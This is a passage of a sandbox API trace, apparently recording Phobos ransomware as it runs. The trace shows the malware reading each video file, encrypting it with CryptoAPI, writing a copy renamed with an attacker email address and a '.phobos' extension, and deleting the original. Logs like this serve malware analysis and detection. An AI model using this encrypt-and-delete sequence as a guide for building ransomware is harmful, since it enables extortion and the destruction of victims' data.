HALPmcxz\\Videos\\ITCckmiJch.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\itcckmijch.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.737] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.737] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.738] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x12081, lpOverlapped=0x0) returned 1 [0199.739] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12090, dwBufLen=0x12090 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12090) returned 1 [0199.739] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x12090, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x12090, lpOverlapped=0x0) returned 1 [0199.756] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0199.756] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.756] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.756] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.756] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.756] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.756] CloseHandle (hObject=0x178) returned 1 [0199.756] CloseHandle (hObject=0x16c) returned 1 [0199.756] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ITCckmiJch.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\itcckmijch.avi")) returned 1 [0199.758] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\KSrK Dj1c.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ksrk dj1c.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.759] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=75301) returned 1 [0199.759] CloseHandle (hObject=0x16c) returned 1 [0199.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\KSrK Dj1c.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ksrk dj1c.mkv")) returned 0x20 [0199.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\KSrK Dj1c.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ksrk dj1c.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\KSrK Dj1c.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ksrk dj1c.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.759] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.759] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\KSrK Dj1c.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ksrk dj1c.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.760] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.760] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.760] ReadFile (in: hFile=0x16c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x12625, lpOverlapped=0x0) returned 1 [0199.761] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12630, dwBufLen=0x12630 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12630) returned 1 [0199.762] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x12630, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x12630, lpOverlapped=0x0) returned 1 [0199.763] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0199.763] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.763] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.763] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.763] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.764] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.764] CloseHandle (hObject=0x16c) returned 1 [0199.764] CloseHandle (hObject=0x178) returned 1 [0199.764] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\KSrK Dj1c.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ksrk dj1c.mkv")) returned 1 [0199.765] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mBEo3DTwT6 887SY49.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mbeo3dtwt6 887sy49.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.766] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2442) returned 1 [0199.766] CloseHandle (hObject=0x178) returned 1 [0199.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mBEo3DTwT6 887SY49.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mbeo3dtwt6 887sy49.mp4")) returned 0x20 [0199.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mBEo3DTwT6 887SY49.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mbeo3dtwt6 887sy49.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mBEo3DTwT6 887SY49.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mbeo3dtwt6 887sy49.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.767] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.767] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mBEo3DTwT6 887SY49.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mbeo3dtwt6 887sy49.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.767] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.767] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.768] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x98a, lpOverlapped=0x0) returned 1 [0199.769] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x990, dwBufLen=0x990 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x990) returned 1 [0199.769] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x990, lpOverlapped=0x0) returned 1 [0199.771] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0199.771] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.771] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0199.771] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.771] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0199.771] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.771] CloseHandle (hObject=0x178) returned 1 [0199.771] CloseHandle (hObject=0x16c) returned 1 [0199.771] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mBEo3DTwT6 887SY49.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mbeo3dtwt6 887sy49.mp4")) returned 1 [0199.772] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\nLlQ_RcPr.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nllq_rcpr.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.773] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13284) returned 1 [0199.773] CloseHandle (hObject=0x16c) returned 1 [0199.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\nLlQ_RcPr.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nllq_rcpr.swf")) returned 0x20 [0199.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\nLlQ_RcPr.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nllq_rcpr.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\nLlQ_RcPr.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nllq_rcpr.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.773] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.773] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\nLlQ_RcPr.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nllq_rcpr.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.774] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.774] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.774] ReadFile (in: hFile=0x16c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x33e4, lpOverlapped=0x0) returned 1 [0199.913] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x33f0, dwBufLen=0x33f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x33f0) returned 1 [0199.913] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x33f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x33f0, lpOverlapped=0x0) returned 1 [0199.914] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa329a8) returned 1 [0199.914] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.914] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.914] CryptDestroyKey (hKey=0xa329a8) returned 1 [0199.914] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.915] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.915] CloseHandle (hObject=0x16c) returned 1 [0199.915] CloseHandle (hObject=0x178) returned 1 [0199.915] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\nLlQ_RcPr.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nllq_rcpr.swf")) returned 1 [0199.916] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uwn6Wtf3 9cv4.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uwn6wtf3 9cv4.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.917] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13955) returned 1 [0199.917] CloseHandle (hObject=0x178) returned 1 [0199.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uwn6Wtf3 9cv4.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uwn6wtf3 9cv4.flv")) returned 0x20 [0199.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uwn6Wtf3 9cv4.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uwn6wtf3 9cv4.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uwn6Wtf3 9cv4.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uwn6wtf3 9cv4.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.917] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.917] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uwn6Wtf3 9cv4.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uwn6wtf3 9cv4.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.918] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.918] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.918] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3683, lpOverlapped=0x0) returned 1 [0199.920] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3690, dwBufLen=0x3690 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3690) returned 1 [0199.920] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3690, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3690, lpOverlapped=0x0) returned 1 [0199.921] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa329a8) returned 1 [0199.921] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.921] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0199.921] CryptDestroyKey (hKey=0xa329a8) returned 1 [0199.921] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0199.922] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.922] CloseHandle (hObject=0x178) returned 1 [0199.922] CloseHandle (hObject=0x16c) returned 1 [0199.922] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uwn6Wtf3 9cv4.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uwn6wtf3 9cv4.flv")) returned 1 [0199.923] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WfRe8W4n.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wfre8w4n.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.924] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=58704) returned 1 [0199.924] CloseHandle (hObject=0x16c) returned 1 [0199.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WfRe8W4n.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wfre8w4n.flv")) returned 0x20 [0199.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WfRe8W4n.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wfre8w4n.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WfRe8W4n.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wfre8w4n.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.924] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.924] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WfRe8W4n.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wfre8w4n.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.925] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.925] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.925] ReadFile (in: hFile=0x16c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe550, lpOverlapped=0x0) returned 1 [0199.927] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe560, dwBufLen=0xe560 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe560) returned 1 [0199.927] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe560, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe560, lpOverlapped=0x0) returned 1 [0199.929] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa329a8) returned 1 [0199.929] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.929] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.929] CryptDestroyKey (hKey=0xa329a8) returned 1 [0199.929] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, 